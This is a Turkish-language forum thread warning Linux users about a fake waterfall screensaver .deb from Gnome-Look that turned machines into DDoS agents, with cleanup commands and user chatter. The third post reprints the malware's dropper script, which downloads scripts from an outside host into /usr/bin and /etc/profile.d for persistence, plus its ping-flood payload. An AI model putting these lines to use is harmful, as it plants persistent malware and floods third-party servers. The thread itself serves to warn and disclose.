folder Tahribat.com Forumları
linefolder Linux ve Diğer İşletim Sistemleri
linefolder Piyasada Linux Malware"Leri Kol Gezmeye Başlamış - Aman Dikkat!



Piyasada Linux Malware"Leri Kol Gezmeye Başlamış - Aman Dikkat!

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Z-CHAN
    Z-CHAN's avatar
    Banlanmış Üye
    Kayıt Tarihi: 14/Haziran/2006
    Erkek

    Gnome-Look'ta ekran koruyucu olduğu iddia edilen bir .deb dosyasının içinde zararlı yazılım bulundu. Bu zararlı yazılımın DDoS saldırıları için sistemde bir ajan işlevi gördüğü ortaya çıktı. Ubuntu ve diğer Debian tabanlı işletim sistemleri de bu yazılımdan etkileniyor.

    Söz konusu .deb dosyası sözde şelaleli bir ekran koruyucusu. Bu program yüklenme işlemi sırada, bir ekran koruyucusu kurmak yerine çeşitli betikler indirip onlara izinler atamakta. Betik kendi kendini yenileyecek şekilde tasarlanmış ve muhtemelen sistemi DDoS saldırılarında kullanma amacı gütmekte.

    Bahsi geçen "ekran koruyucusu" şu an Gnome-Look'tan silindi. Bu hadise bizlere tıpkı Windows'ta olduğu gibi Linux kullanıcılarının da resmi depolar ve güvenilir PPA'lar harici yerlerden yazılım yüklerken dikkatli olmadıkları taktirde zararlı yazılımlardan etkilenebileceği gerçeğini göstermiştir.

     

    Düzeltme

    Eğer bu yazılımı yüklemiş iseniz, alttaki komutları komut satırına vererek bu zararlı yazılımı temizleyebilirsiniz.

    sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash

    sudo dpkg -r app5552

    Daha fazla yardım için Ubuntu Forum'a göz atın.

     

    UYARI: "Ninja Black" isimli Gnome temasının da zararlı yazılım barındırdığı düşünülmektedir.

    ---

    Kaynak: http://digitizor.com/2009/12/10/ubuntu-malware-for-ddos-attack-found-in-screensaver/?utm_source=feedburner&utm_medium=email&utm_campaign=Feed%3A+digitizor+%28Digitizor%29&utm_content=Gmail


    .
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    RitmFarbRacourci
    RitmFarbRacourci's avatar
    Kayıt Tarihi: 14/Mart/2008
    Erkek

    Yani ha win serileri ha linux serileri bir sekilde programlamadan kodlardan cakmayan, her sekilde tehdit altında. 


    I'şıkY'ılı;^^`) Zk't^^` RnSySyTk.Ödl.SpRtÇzBşBkYd Kryptia.agogE Sa'd-l'Suûd az.ç'k 'lmyn'Dşn Pnct'tnAnNttn Blgi,YpBlgi 'Ct'nDrm.CmdyDrm.MdrnDrm hRşYdşR ClptcPth'Strsm M'nPhs' Ld,X/Y YrYnZmnGrçklk,AlgBzklğ KrzFrst'tr Tiytr' Pugchv,Jtrn,İmmlmn,FllngLef,Pik' SuprmcySprrty CoBehTh elFnmno:NzrioRonldo AdnKy TkSs,TkHrf(?) .RtNsTk.KvMp.Mk.TrmDyn ScklkNmRzgr ŞkHcBy ccp.kky Snrlr'Çz SnaSnLzmsn 'NsnKsknçtr BgDppr.MagllnCl'ds.S'thCro's Ch'kW'ng CreazioneDiAdamo^^`, Arctrs.Spic' ArcScnd,YySnye TrbProp,TrbJet,TrbFan ~3.10^5km/sn~343m/sn ~900-1240m/snMacH RamJt,ScRamJt Przdi^^' Tbu.XL Prsek MAtv^^` mLAT G'dWllHnting(f). 3id't^^` TareZmenPr ParaMotor TrflrVArsİlşklr (-)+.(/)*,~ ZminŞkil . ..Bu imza @SubZero tarafindan degistirilmistir. "Bu kadar uzun karmakarisik bir imza yapma diye uyardim ama heeheeeey(^^D)_hey kim söylüyor, kim dinliyor." Imzanizi SubZero'ya bilgi vermeden degistirmeyiniz. Tesekkurler...
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Z-CHAN
    Z-CHAN's avatar
    Banlanmış Üye
    Kayıt Tarihi: 14/Haziran/2006
    Erkek

    Bu da söz konusu zararlı yazılım betiği:

     

    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit

     

    Bu betik ise basitçe şu betiği indirip çalıştırıyormuş:

    ping -s 65507 www.mmowned.com

     

    Ubuntu Forumu'ndaki eleman çakmasa çok kötü sonuçlar doğabilirdi. Ben de Gnome-Look'tan paldır küldür tema çekerdim...


    .
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Z-CHAN
    Z-CHAN's avatar
    Banlanmış Üye
    Kayıt Tarihi: 14/Haziran/2006
    Erkek

    Uyarmak açısından up!


    .
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    husnuweb
    husnuweb's avatar
    Kayıt Tarihi: 04/Nisan/2007
    Erkek

    Neyse ki windows'ta böyle bir sorunumuz yok :)


    He is finding himself.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    SUPERBICO
    SUPERBICO's avatar
    Kayıt Tarihi: 13/Haziran/2008
    Erkek

    allah linuxcuları korusun :|

  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    u235
    u235's avatar
    Kayıt Tarihi: 31/Mart/2008
    Erkek

    Linux güvenli diyorduk o da mı yalan oluyor :|

  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    opensource2009
    opensource2009's avatar
    Kayıt Tarihi: 19/Aralık/2008
    Erkek

    Botnet olmak gibi.Dosyalara zarar verilmesi veri çalınması gibi birşey söz konusu değil.Açık kaynak olunca hemen farkediliyor böyle.

  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    3Dxsolid
    3Dxsolid's avatar
    Kayıt Tarihi: 14/Aralık/2009
    Erkek

    linux u kendi serverinden indirip bilmediğin uygulama yüklemezsen bişey olmaz...


    Hayırlısı...
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ayro
    Ayro's avatar
    Kayıt Tarihi: 08/Ağustos/2005
    Erkek

    sağolasın.

    Abi bazıları linux güvenli değil mi falan demiş.Windowsta olduğu için şükretmiş :-/

    Linuxta windowsa göre daha güvendesiniz.Virüs konusunda, zombi olma konsuunda vs..TAbi ki linuxtada çok kritik açıklar vs. olabilir.Yada virüsler olabilir.FAkat kaç linuxçu virüsler yüzünden format atmıştır ? Bu günlerde bilmek istediğim bir konu.

     

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    esinti
    esinti's avatar
    Kayıt Tarihi: 27/Ağustos/2015
    Erkek

    illegal66 bunu yazdı:
    -----------------------------

    linux u kendi serverinden indirip bilmediğin uygulama yüklemezsen bişey olmaz...


    -----------------------------

    katılıyorum arkadaşa linux kullanmasamda  her zaman desteklerim

Toplam Hit: 2799 Toplam Mesaj: 12